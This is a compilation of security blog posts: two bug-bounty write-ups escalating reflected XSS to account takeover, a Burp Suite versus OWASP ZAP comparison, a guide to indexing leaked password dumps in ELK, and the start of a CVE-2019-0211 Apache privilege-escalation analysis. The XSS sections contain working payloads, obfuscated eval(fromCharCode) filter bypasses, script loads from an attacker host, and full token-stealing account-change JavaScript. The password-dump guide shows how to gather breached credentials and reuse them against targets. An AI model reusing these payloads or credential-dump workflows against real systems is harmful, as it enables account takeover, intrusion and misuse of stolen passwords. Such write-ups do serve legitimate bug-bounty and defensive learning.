Escalating XSS to Account Takeover

Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

I've read many bug hunters say: don't submit a simple XSS, try to escalate it first. I would tell you the same: escalate as much as you can. If you hand over an XSS and merely describe what an attacker could do with it, it doesn't demonstrate nearly as much impact as actually proving how it would be done; that proof increases both the severity and your payout.

So, I was hunting on a subdomain of a private program, say sub.example.com. I had been looking at this subdomain for a few days and understood almost everything about how it worked and what a normal account could do. Next, I started looking for files that were not directly linked in various directories of the site, fuzzing directories and files with FFUF. I found a file that looked interesting: a page to register (let's name it sub.example.com/fakepath/register), while the main page that opened when someone actually clicked to register was sub.example.com/fakepath/registration.

This felt like a page that had been used earlier and then replaced when things changed. As you probably know, old and forgotten pages are more likely to contain bugs.

I ran Arjun to check for hidden parameters and luckily found a few that were reflected back on the page. Two of them were filled into the input fields of the registration form. I sent the request with the first parameter and the value supplied through the URL ended up in the city input field. I sent the request to Burp Suite Repeater and tried basic XSS inputs. Sadly, they got HTML encoded; I tried single URL encoding and double URL encoding, neither worked, so I moved on to check the other parameters.

After trying almost every parameter received from Arjun, I came back to the Repeater tab of the earlier one and gave it another try with triple URL encoding, and guess what: the quote (") character passed through.

I made a simple payload to check: sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522. I added the x parameter at the end to balance the quote that the application appends. I hovered over the city input field and the alert popped. I checked the other parameter that was reflected in another input field and it was vulnerable to a similar payload. I also noticed that the registration and register pages are almost identical, so I gave it a try on registration, and both parameters were vulnerable on that page as well.
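
Why triple encoding? The value apparently passes through multiple decoding layers before it is reflected, so each extra layer of encoding survives one decode. A minimal sketch of the idea (assuming three successive URL decodes, which may not be exactly what the backend does):

from urllib.parse import unquote

payload = "aditya%252522+onmouseover=alert(1)+x=%252522"
for i in range(3):
    payload = unquote(payload)
    print(f"decode {i + 1}: {payload}")
# decode 1: aditya%2522+onmouseover=alert(1)+x=%2522
# decode 2: aditya%22+onmouseover=alert(1)+x=%22
# decode 3: aditya"+onmouseover=alert(1)+x="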

I reported the bug as medium severity and stepped back. Then came the thought: try to escalate it, like other people say. I was reluctant at first, but since I had already checked various forms (account edit and others) for CSRF, I figured: since this can execute script, why not fetch the account-edit page with JavaScript, which will come back with the CSRF token (in this case, tokens), and then resubmit the data with the email changed.

This took some time, as I am not much of a developer, but a short time earlier I had done a project with Node.js. With that bit of familiarity and a lot of googling I somehow got the jigsaw pieces aligned and the script was ready (I built it in the Firefox developer tools; in case anyone wants to know how, the console panel lets you run JavaScript on a page as if it had been delivered with it). I hosted the script locally and used ngrok to create a tunnel to localhost, then used the following payload: sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

// Arrays holding the names and values of the hidden (CSRF) inputs
// scraped from the account-edit page.
let name = [];
let value = [];

// Step 1: fetch the account-edit page as the victim; the response
// contains the form with its hidden CSRF token fields.
fetch('https://sub.example.com/fakepath/accountchange.php?update=1')
  .then(function (response) {
    return response.text();
  })
  .then(function (html) {
    // Convert the HTML string into a document object
    var parser = new DOMParser();
    var doc = parser.parseFromString(html, 'text/html');
    // Collect every hidden input (this is where the CSRF tokens live)
    var element = doc.querySelectorAll('input[type="hidden"]');
    for (var i = 0; i < element.length; i++) {
      name.push(element[i].name);
      value.push(element[i].value);
    }
    console.log(name, value, "\n");
  })
  .catch(function (err) {
    // There was an error
    console.warn('Something went wrong.', err);
  });

// Step 2: replay the form with the harvested tokens, but with the
// attacker-controlled email address.
function sendData() {
  const XHR = new XMLHttpRequest(),
        FD  = new FormData();
  console.log(name, value);
  // Copy the harvested hidden fields into the form data
  // (this particular form had 7 hidden inputs).
  for (var i = 0; i < 7; i++) {
    FD.append(name[i], value[i]);
  }
  FD.append('lastname', 'a');
  FD.append('name', 'test');
  FD.append('email', 'hellrider9+1@wearehackerone.com');
  FD.append('Sumbit', 'Sumbit'); // field name as used by the target form
  // Define what happens on successful data submission
  XHR.addEventListener('load', function (event) {
    alert('Yeah! Data sent and response loaded.');
  });
  // Define what happens in case of error
  XHR.addEventListener('error', function (event) {
    alert('Oops! Something went wrong.');
  });
  // Set up our request; HTTP headers are set automatically for FormData
  XHR.open('POST', 'https://sub.example.com/fakepath/accountchange.php?update=1');
  XHR.send(FD);
}

// Give the fetch a few seconds to complete before replaying the form.
setTimeout(sendData, 7000);

If anyone wants to understand the code, you can contact me directly on Twitter; my handle is 0cirius0.

Coming back to the point: this reflected XSS became a high-severity account takeover.

Weaponizing XSS For Fun & Profit

Original text by Saad Ahmed

Hi folks! Hope you are all doing well. I am back with another amazing way of bypassing a WAF that was blocking me from weaponizing an XSS. Without wasting any time, let's get started.

The XSS part is very simple: my input is reflected inside the href of an <a> tag, e.g. <a href="https://example.com/home/leet">Home</a>

Escaping from the href is very simple; my payload is leet" onmouseover=alert(1)". Now when I move my mouse over the link, the XSS pops up. This is very simple and basic so far.

It's time to do something BIG!!! I started checking all the endpoints of the web app that disclose sensitive information which I could steal via the XSS to show impact to the team. After checking all the requests, I realized that every request carries a CSRF token header, so I needed to steal that token and then send the request using fetch to weaponize the XSS.

I tried removing the CSRF token from the request and bang!! The request went through without any error and the account information was UPDATED. But when I tried to reproduce this by creating an HTML form, the server returned 403 missing CSRF TOKEN. After checking the request and matching all the headers, I realized the devs had taken a shortcut (jugaad) to prevent CSRF: they check the Referer header. If the request comes from example.com they accept it, otherwise they return 403 with missing CSRF TOKEN.

Since I already have XSS, I don't need to worry about the Referer ✌️ I simply sent the jQuery POST request below from the console just to verify it, and it worked.

$.post("https://example.com/account/update_info/",{name: "Account Update"},function(data,status){alert("Data: " + data + "\nStatus: " + status);});

So my final payload to update the account information was:

leet" onmouseover='$.post(`https://example.com/account/update_info/`,{name: `Account Update`},function(data,status){alert(`Data: ` + data + `Status: ` + status);});'"

The payload didn't work. Now here the server is doing something annoying: it replaces the . character with _, e.g. example.com becomes example_com. I tried everything here, encoding and so on, but nothing worked. Then it clicked: why not simply load a JS file from my own server? But again, I would need to put in my server URL, which also contains a ., and document.createElement() contains a . as well.

For those who don't know, we can also use document.createElement() without a . by using bracket notation, like this: document['createElement']('script')

So the final code that loads the JS from the attacker's server is:

a=document['createElement']('script');a['setAttribute']('src','attacker.com/x.js');document['head']['appendChild'](a);

String['fromCharCode'](100,111,99,117,109,101,110,116,91,39,99,114,101,97,116,101,69,108,101,109,101,110,116,39,93,40,39,115,99,114,105,112,116,39,41,97,91,39,115,101,116,65,116,116,114,105,98,117,116,101,39,93,40,39,115,114,99,39,44,39,97,116,116,97,99,107,101,114,46,99,111,109,47,120,46,106,115,39,41,59,100,111,99,117,109,101,110,116,91,39,104,101,97,100,39,93,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,97,41)

I converted the script-tag creation into charCodes because the payload contains the . character that the server mangles.

When I executed this from the XSS, the server encoded the [ ] characters, so the . bypass was useless 😠 I tried everything to bypass the [ ] filtering but nothing worked. One of my friends told me you can call a script from the server without . & [ ] and I was like tell me bruhh howww!!!

with(String){eval(fromCharCode(97,108,101,114,116,40,49,41))}

So we can use with(String) and pass the return value of fromCharCode into eval to execute the string, with no need for . or [ ].
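
Generating the character codes for any payload takes one line; a quick helper like this (my own sketch, not the author's tooling) prints the comma-separated list ready to drop into the with(String){eval(fromCharCode(...))} wrapper:

payload = "alert(1)"
char_codes = ",".join(str(ord(c)) for c in payload)
print(f"with(String){{eval(fromCharCode({char_codes}))}}")
# with(String){eval(fromCharCode(97,108,101,114,116,40,49,41))}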

The final payload looks like this:

$.post("https://example.com/account/update_info/",{name: "Account Update"},function(data,status){alert("Data: " + data + "\nStatus: " + status);});

Converted into charCodes and placed inside the with(String){eval(fromCharCode(...))} wrapper, the code looks like this:

with(String){eval(fromCharCode(36,46,112,111,115,116,40,34,104,116,116,112,115,58,47,47,109,105,120,112,97,110,101,108,46,99,111,109,47,97,99,99,111,117,110,116,47,117,112,100,97,116,101,95,110,97,109,101,47,34,44,123,101,109,97,105,108,58,32,34,115,104,103,51,51,107,64,103,109,97,105,108,46,99,111,109,34,125,44,102,117,110,99,116,105,111,110,40,100,97,116,97,44,115,116,97,116,117,115,41,123,99,111,110,115,111,108,101,46,108,111,103,40,34,68,97,116,97,58,32,34,32,43,32,100,97,116,97,32,43,32,34,92,110,83,116,97,116,117,115,58,32,34,32,43,32,115,116,97,116,117,115,41,59,125,41,59))}

URL-encode the above code and the final payload becomes:

https://example.com/home/leet" onmouseover='URLENCODED PAYLOAD' "

Send the above link to anyone and you can update their account information, delete the account, and perform many other actions.

The program paid $400 for the XSS and told me to submit a new report for the CSRF issue; they paid $1800 for the CSRF, so the total is $2200.

This whole bypass and escalation process took 3 days 🙌. I hope you guys learned something new here.

./LOGOUT

Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.

:::DISCLAIMER:::

I am no expert in either tool; however, I have used them enough to feel good about documenting their features in this post. Please comment if you see an error or want to point out something I missed.

Introduction

Both OWASP ZAP and Burp Suite are intercepting proxies (on steroids) that sit between the browser and the web server to intercept and manipulate the requests exchanged.

OWASP ZAP is a free and open-source project actively maintained by volunteers, while Burp Suite is a commercial product maintained and sold by PortSwigger. Both have made almost every "top 10 tools of the year" list, and in this post I will compare the 2020.x version of Burp Suite, which saw its first release in January 2020.

Since they emerged on the market, both have been gaining more and more momentum and users, as Google Trends shows for the past 5 years (2015-2020). Hopefully, by the end of this post, you will have a better understanding of their similarities and differences.

Trends between 2015 and 2020
Google Trends showing Burp suite in blue and OWASP ZAP in Red

I will discuss the differences between both tools in regards to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while, it gets intuitive and has all the necessary info you need to know. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar – Provides most of the functionality of Burp in simple tabs
  3. Status Bar – Provides information for memory and disk space used by burp (new handy feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities and is Active on a paid version of Burp Suite Pro or Enterprise
  6. Tasks menu – Provides simple information and control over current running, paused and finished tasks

ZAP's interface likewise consists of 6 simple items:

ZAP 1.8.0 user interface Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both Burp Suite and ZAP have good sets of capabilities; however, in some areas one tool excels over the other. We will get to each one further down and in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto check for Update features.
  • Save and Load Project files.
  • Exposed and usable APIs.
  • Passive and Active scan engine.
  • Session Token entropy Analysis (Burp only; if you know that ZAP supports this, even with add-ons, please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
  • Diff-like capability or comparison feature (Burp only; AFAIK no out-of-the-box support in ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features, so if you know a feature I missed, please comment below.

3. User experience

A while back, I had to use both tools for a comparison. While I am more used to Burp Suite, at first glance OWASP ZAP does the same job but has to be enhanced with plugins; keep in mind there is a learning curve for both.
For example, ZAP has a single fuzzer window, which makes it harder to search fuzzer results, especially when you run multiple fuzzers, whereas Burp keeps a separate window and configuration for each fuzz run. The same goes for other features.
Unlike Burp, you can't change (add, edit or remove) HTTP headers in ZAP's fuzzer window. Burp also has the edge in that it allows you to sort and search fuzzing results faster and more effectively.

zap fuzzer
Zap 2.8.0 Fuzzer window
Burp fuzzer configurability
Burp 2020.2.1 Fuzzer window

Which one do you find more intuitive?

One big plus for Burp is the Comparer tab; it allows for easier change detection, like spotting differences in size, timestamps, tokens, or content. ZAP lacks this feature without extensions (comment below if you know which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is searching for text in the request or the server response; Burp makes this more accessible, letting you search by plain text or regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than ZAP is the Sequencer's ability to measure token entropy and randomness for cryptographic analysis. This is very useful when session cookies are generated by a custom, home-grown mechanism.

Burp Sequencer run statistics on tokens and calculates Entropy

However, one big plus for ZAP is its API, which makes integration and automation easier than with Burp. You can access the API from the browser, from other user agents like curl, or via SDKs/libraries.

Burp Suite Community Edition's API can only be used to write plugins and extensions, unlike ZAP's, which can be used in DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018 which makes it easier to integrate burp with other tools and workflows.

An example is using the API to spider a host and getting the results, e.g. crawling testphp.vulnweb.com from the console.
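
As a rough sketch of what that console-driven crawl can look like, the following drives ZAP's JSON API directly (endpoint paths follow the ZAP 2.x API as I recall it; the local address, port and API key are assumptions you would adjust):

import json, time, urllib.parse, urllib.request

ZAP = "http://127.0.0.1:8080"      # local ZAP instance with the API enabled (assumed)
APIKEY = "changeme"                # assumed API key
TARGET = "http://testphp.vulnweb.com"

def zap(path, **params):
    # Helper: call a ZAP JSON API endpoint and decode the response
    params["apikey"] = APIKEY
    qs = urllib.parse.urlencode(params)
    with urllib.request.urlopen(f"{ZAP}{path}?{qs}") as r:
        return json.load(r)

# kick off the spider against the target
scan_id = zap("/JSON/spider/action/scan/", url=TARGET)["scan"]

# poll until the spider reports 100%
while int(zap("/JSON/spider/view/status/", scanId=scan_id)["status"]) < 100:
    time.sleep(2)

# print every URL the spider discovered
for url in zap("/JSON/spider/view/results/", scanId=scan_id)["results"]:
    print(url)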

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines, no matter how big or small your environment is.

ZAP API in action

For a while, only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security Academy.

4. Pros and Cons of each tool

In my experience, ZAP shines in DevOps/DevSecOps scenarios thanks to its easier API integration and support, while Burp is more oriented towards hands-on vulnerability assessment and penetration testing of web applications.

At the different price points for each tool, it is up to your scenario to decide if more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, While OWASP ZAP is a free and open-source project under Apache 2.0 License.

In conclusion, both tools are good in their own ways and use cases. Tell me which tool you like and share your tips and tricks for ZAP or Burp (●'◡'●)

Public password dumps in ELK

Original text by Marc Smeets

Passwords, passwords, passwords: end users and defenders hate them, attackers love them. Despite the recent focus on stronger authentication forms by defenders, passwords are still the predominant way to get access to systems. And due to the habit of end users reusing passwords, and the multitude of public leaks in the last few years, they serve as an important attack vector in the red teamer's arsenal. Find accounts of target X in the many publicly available dumps, try these passwords or logical iterations of them (Summer2014! might very well be Winter2018! at a later moment) on a webmail or other externally accessible portals, and you may have gained initial access to your target's systems. Can't find any accounts of your target in the dumps? No worries, your intel and recon may give you private email addresses that very well may share a password with the target's corporate counterparts.

Major public password dumps

Recently, two major password dumps got leaked publicly: Exploit.in and Leakbase (goes also by the name BreachCompilation). This resulted in many millions of username-password combinations to be leaked. The leaks come in the form of multiple text files, neatly indexed in alphabetical order for ‘quick’ lookup. But the lookup remains extremely slow, especially if the index is done on the username instead of the domain name part of the email address. So, I wanted to re-index them, store them in a way that allows for quick lookup, and have the lookup interface easily accessible. I went with ELK as it ticks all the boxes. I’ll explain in this blog how you can do the same. All code can be found on our GitHub.

A few downsides of this approach

Before continuing I want to address a few shortcomings of this approach:

  • Old data: one can argue that many of the accounts in the dumps are years old and therefore not directly useful. Why go through all the trouble? Well, I'd rather know the old passwords and then decide whether I want to use them, than not know them at all.
  • Parsing errors: the input files of the dump are not nicely formatted. They contain lots of errors in the form of different encodings, control characters, inconsistent structure, etc. I want to ‘sanitize’ the input to a certain degree to filter out the most commonly used errors in the dumps. But, that introduces the risk that I filter out too much. It’s about finding a balance. But overall, I’m ok with losing some input data.
  • ELK performance: Elasticsearch may not be the best solution for this. A regular SQL DB may actually be better suited to store the data as we generally know how the data is formatted, and could also be faster with lookups. I went with ELK for this project as I wanted some more mileage under my belt with the ELK stack. Also, the performance still is good enough for me.

Overall process flow

Our goal is to search for passwords in our new Kibana web interface. To get there we need to do the following:

  1. Download the public password dumps, or find another way to have the input files on your computer.
  2. Create a new system/virtual machine that will serve as the ELK host.
  3. Setup and configure ELK.
  4. Create scripts to sanitize the input files and import the data.
  5. Do some post import tuning of Elasticsearch and Kibana.

Let’s walk through each step in more detail.

Getting the password dumps

Pointing you to the downloads is not going to work as the links quickly become obsolete, while new links appear. Search and you will find. As said earlier, both dumps from Exploit.in and Leakbase became public recently. But you may also be interested in dumps from 'Anti Public', LinkedIn (if you do the cracking yourself) and smaller leaks less broadly discussed in the news. Do note that there is overlap in the data from different dumps: not all dumps have unique data.

Whatever you download, you want to end up with (a collection of) files that have their data stored as username:password. Most of the dumps have it that way by default.

Creating the new system

More is better when talking about hardware. Both in CPU, memory and disk. I went with a virtual machine with 8 cores, 24GB ram and about 1TB of disk. The cores and memory are really important during the importing of the data. The disk space required depends on the size of the dumps you want to store. To give you an idea: storing Leakbase using my scripts requires about 308GB for Elasticsearch, Exploit.In about 160GB.

Operating-system-wise I went with a rather default Linux server. A small convenience note: set up the disk using LVM so you can easily grow it if you require more space later on.

Setup and configure ELK

There are many manuals for installation of ELK. I can recommend @Cyb3rWard0g’s HELK project on GitHub. It’s a great way to have the basics up and running in a matter of minutes.

git clone https://github.com/Cyb3rWard0g/HELK.git
./HELK/scripts/helk_install.sh

There are a few things we want to tune that will greatly improve the performance:

  • Disable swap, as it can really kill Elasticsearch's performance: sudo swapoff -a, and remove the swap mounts from /etc/fstab.
  • Increase the JVM's memory usage to about 50% of available system memory:
    Check the JVM options files at /etc/elasticsearch/jvm.options and /etc/logstash/jvm.options, and change the values of -Xms and -Xmx to half of your system memory. In my case for Elasticsearch: -Xmx12g -Xms12g. Do note that the Elasticsearch and Logstash JVMs work independently and therefore their values together should not surpass your system memory.

We also need to instruct Logstash about how to interpret the data. I’m using the following configuration file:

root@office-elk:~# cat /etc/logstash/conf.d/passworddump2elk.conf
input {
    tcp {
        port   => 3515
        codec  => line
    }
}

filter{
   dissect {
     mapping => { "message" => "%{DumpName} %{Email} %{Password} %{Domain}" }
   }
   mutate{
      remove_field => [ "host", "port" ]
   }
}

output {
    if " _dissectfailure" in [tags] {
       file {
          path => "/var/log/logstash/logstash-import-failure-%{+YYYY-MM-dd}.log"
          codec => rubydebug
       }
   } else {
      elasticsearch{
         hosts => [ "127.0.0.1:9200" ]
         index => "passworddump-%{+YYYY.MM.dd}"
      }
   }
}

As you can see in the dissect filter we expect the data to appear in the following format:

DumpName EmailAddress Password Domain

There is a very good reason why we also want the Domain part of the email address as a separate indexable field: as red teamers you tend to search for accounts tied to specific domains/companies. Searching for <anything>@domainname is an extremely CPU-expensive search to do. So, we spend some more CPU power during the import to get quicker lookups in the end. We also store the DumpName as this might come in handy in some cases. And for troubleshooting we store all lines that didn't parse correctly, using the "_dissectfailure" tag check shown above.

Note: using a dissect vs a grok filter gives us a small performance increase. But if you want you can accomplish the same using grok.

Don’t forget to restart the services for the config to become active.

Sanitize and import the data

The raw data that we get from the dumps is, generally speaking, organized. But it does contain errors, e.g. parts of HTML code as passwords, weirdly long lines, multitudes of spaces, passwords in languages that we are not interested in, and non-printable control characters.

I’ve chosen to do the following cleaning actions in my script. It’s done with simple cut, grep, awk commands, so you can easily tune to your preference:

  • Remove spaces from the entire line
    This has the risk that you lose passwords that have a space in it. In my testing I’ve concluded that the far majority of spaces in the input files are from initial parsing or saving errors, and only a tiny fraction could perhaps be a (smart) user that had a space in the password.
  • Convert to all ASCII
    You may find the most interesting character set usage in the dumps. I’m solely interested in full ASCII. This is a rather bold way to sanitize that works for me. You may want to do differently.
  • Remove non-printable characters
    Again you may find the most interesting characters in the dumps. During my testing I kept encountering control characters that I never even heard about. So I decided to remove all non-printable all together. But whatever you decide to change, you really want to get rid of all the control characters.
  • Remove lines without proper email address format
    This turns out to be a rather efficient way of cleaning. Do note that this means that the occasional username@gmail..com will also be purged.
  • Remove lines without a colon, empty username or empty password
    In my testing this turned out to be rather effective.
  • Remove really long lines (60+ char)
    You will purge the occasional extremely long email addresses or passwords, but in my testing this appeared to be near 0. Especially for corporate email addresses where most of the times a strict naming policy is in place.
  • Remove Russian email addresses (.ru)
    The amount of .ru email addresses in the dumps, and the rather unlikely case that it may be interesting, made me purged them all together. This saves import time, lookup time and a considerable amount of disk space.

After purging the irrelevant data, we still need to reformat it in a way that Logstash can understand. I use an AWK one-liner for this, which is explained in the comments of the script. Finally, we send it to the Logstash daemon, which does the formatting and forwards it to Elasticsearch.
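
For illustration only, here is a rough Python equivalent of that reformat-and-ship step (the real work is done by the AWK one-liner in the script on GitHub; the field order matches the dissect mapping shown earlier):

import socket, sys

dump_name, infile = sys.argv[1], sys.argv[2]   # e.g. LeakBase cleaned.txt

with socket.create_connection(("127.0.0.1", 3515)) as s, open(infile, errors="ignore") as f:
    for line in f:
        line = line.strip()
        if ":" not in line:
            continue                           # skip lines without a separator
        email, password = line.split(":", 1)
        if "@" not in email or not password:
            continue                           # skip malformed records
        domain = email.split("@", 1)[1]
        # one "DumpName Email Password Domain" record per line, as the dissect filter expects
        s.sendall(f"{dump_name} {email} {password} {domain}\n".encode())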

It’s important to note that even though we rather heavily scrutinized the input data earlier on, the AWK reformatting and the Logstash importing still can filter out lines that contain errors.

Overall, we lose some data that might actually have been usable if sanitized differently. When using my scripts on the Leakbase dump, you end up with 1.1 billion records in Elasticsearch while the import data roughly contains 1.4 billion records. For the Exploit.In dump it's about 600 million out of 800 million. It's about finding a balance that works for you. I'm looking forward to your pull requests for better cleaning of the import data.

To kick off the whole importing you can run a command like:

for i in $(find ./BreachCompilation/data/*.txt -type f); do ./sanitizePasswordDump.sh $i LeakBase; done

The 2nd parameter (LeakBase) is the name I give to this dump.

Don’t be surprised if this command takes the better part of a day to complete, so run it in a screen session.

Post import tuning

Now that we are importing data into Elasticsearch, there is a small performance tuning we can do: remove the indexing of the 'message' field. The message field contains the entire message that was received via Logstash. An index requires CPU power and uses (some) disk space. As we already index the sub-fields, indexing it is rather useless. You can also choose not to store it at all, but the general advice is to keep it around; you never know when it becomes useful. With the following command we keep it, but remove the indexation.

curl -XPUT http://localhost:9200/_template/passworddump_template -d '
{
 "template" : "passworddump-*",
 "mappings" : {
  "logs": {
   "properties" : {
    "message" : {
    "type":"text", "store":"yes", "index":"false", "fields":{"keyword":{"type":"keyword","ignore_above":256}}
    }
   }
  }
 }
}'

Now the only thing left to do is to instruct Elasticsearch to create the actual index patterns. We do this via the Kibana web interface:

  • click ‘Management’ and fill in the Index pattern: in our case passworddump-*.
  • Select the option ‘I don’t want to use the Time Filter’ as we don’t have any use for searching on specific time periods of the import.

Important note: if you create the index before you have altered the indexation options (previous step), your indexation preferences are not stored; they are only set at index creation time. You can verify this by checking whether the 'message' field is searchable; it should not be. If it is, remove the index, store the template again and recreate the index.

There are a few more things that can make your life easier when querying:

  1. Change advanced setting discover:sampleSize to a higher value to have more results presented.
  2. Create a view with all the relevant data in 1 shot:
    By default Kibana shows the raw message on the screen. This isn't very helpful. Go to 'Discover', expand one of the results and hit the 'Toggle column in table' button next to the fields you want displayed (e.g. DumpName, Email, Password and Domain).
  3. Make this viewing a repeatable view
    Now hit ‘Save’ in the top bar, give it a name, and hit save. This search is now saved and you can always go back to this easy viewing.
  4. Large data search script
    For the domains that have more than a few hits, or for cases where you want to redirect the output to a file for easy importing into another tool, Kibana is not the easiest interface. I've created a little script that can help you. It requires 1 parameter: the exact Domain search string you would give to Elasticsearch when querying it directly. It returns a list of username:password for your query; a sketch of such a direct query follows below.
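
To give an idea of what such a direct query looks like, this sketch asks Elasticsearch for all records of a given domain and prints username:password pairs (my own illustration, not the actual script; it assumes the default dynamic mapping, which adds a .keyword subfield to the Domain field):

import json, sys, urllib.request

domain = sys.argv[1]                          # e.g. example.com
query = {
    "size": 10000,
    "_source": ["Email", "Password"],
    "query": {"term": {"Domain.keyword": domain}},
}
req = urllib.request.Request(
    "http://localhost:9200/passworddump-*/_search",
    data=json.dumps(query).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as r:
    for hit in json.load(r)["hits"]["hits"]:
        print(f"{hit['_source']['Email']}:{hit['_source']['Password']}")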

Good luck searching!

CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

Original text by cfreal

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), the scoreboard, which contains various information such as the workers' PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447, 
  generation = 0, 
  quiescing = 0 '\000', 
  not_accepting = 0 '\000', 
  connections = 0, 
  write_completion = 0, 
  lingering_close = 0, 
  keep_alive = 0, 
  suspended = 0, 
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills the old workers and replaces them with new ones. At this point, every old worker's bucket value will be used by the main process to index one of its own arrays, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.

Vulnerable code

We’ll go through server/mpm/prefork/prefork.c to find out where and how the bug happens.

  • A rogue worker changes its bucket index in shared memory to make it point to a structure of his, also in SHM.
  • At 06:25AM the next day, logrotate requests a graceful restart from Apache.
  • Upon this, the main Apache process will first kill workers, and then spawn new ones.
  • The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP.
  • Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away.
  • Instead, we enter the main loop (L933) and monitor dead workers’ PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940).
  • The index of the process_score structure associated with this PID is stored in child_slot (L948).
  • If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket‘s value has been changed by a rogue worker.
  • make_child() creates a new child, fork()ing (L671) the main process.
  • The OOB read happens (L691), and my_bucket is therefore under the control of an attacker.
  • child_main() is called (L722), and the function call happens a bit further (L433).
  • SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443).
  • Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control.
  • Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four-step process:

  1. Obtain R/W access on a worker process
  2. Write a fake prefork_child_bucket structure in the SHM
  3. Make all_buckets[bucket] point to the structure
  4. Await 6:25AM to get an arbitrary function call

Advantages:

  • The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless)
  • When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DoSing Apache

Problems:

  • PHP does not allow reading/writing /proc/self/mem, which blocks us from simply editing the SHM
  • all_buckets is reallocated after a graceful restart (!)

